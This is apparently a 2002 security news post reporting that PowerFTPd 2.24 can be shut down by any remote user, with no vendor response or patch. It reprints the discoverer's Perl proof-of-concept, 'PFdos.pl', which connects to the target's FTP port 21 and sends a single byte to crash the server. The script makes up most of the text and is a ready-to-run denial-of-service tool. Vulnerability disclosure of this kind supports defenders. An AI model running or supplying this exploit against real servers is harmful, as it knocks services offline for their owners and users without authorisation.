PowerFTPd remote shutdown vulnerability

by Nikola Strahija on October 12th, 2002

Securma Massine has found a vulnerability in PowerFTPd 2.24: any remote user can shut down the FTP server. Vulnerability level is high.


The vendor, Coolsoft, was notified on the 5th of October 2002,
and Securma Massine (who found this vulnerability) hasn't received
any reply yet.
No patch is available.
Known vulnerable versions: PowerFTPd 2.24 (and possibly earlier).


Securma Massine has attached proof-of-concept code:

#!/usr/bin/perl -w
##
# tool: PFdos.pl
# author: [email protected]
# purpose: allows a remote user--any user--to shut down the ftp server
# greetz: all friend in marocit and #crack.fr (especially christal)
##

use Socket;

# The target host is taken from the first command-line argument.
if (not $ARGV[0]) {
    print qq~
Usage: pfdos.pl
~;
    exit;
}

$ip = $ARGV[0];
print "+++++++++++++++++++++++\n\n";
print "PowerFTP DOS \n\n";
print "by securma massine \n\n";
print "[email protected] \n\n";
print "+++++++++++++++++++++++\n\n";
print "Sending Exploit Code to host: " . $ip . "\n\n";
sendexplt("A");

# Opens a TCP connection to the FTP control port and writes $pstr to it.
sub sendexplt {
    my ($pstr) = @_;
    $target = inet_aton($ip) || die("inet_aton problems");
    socket(S, PF_INET, SOCK_STREAM, getprotobyname('tcp') || 0) ||
        die("Socket problems\n");
    # Hand-packed sockaddr_in: AF_INET (2), port 21, 4-byte address, 8 bytes of padding.
    if (connect(S, pack "SnA4x8", 2, 21, $target)) {
        select(S);   # make the socket the default output handle
        $| = 1;      # unbuffered, so the data is sent immediately
        print $pstr;
        sleep 3;
        close(S);
    } else { die("Can't connect...\n"); }
}

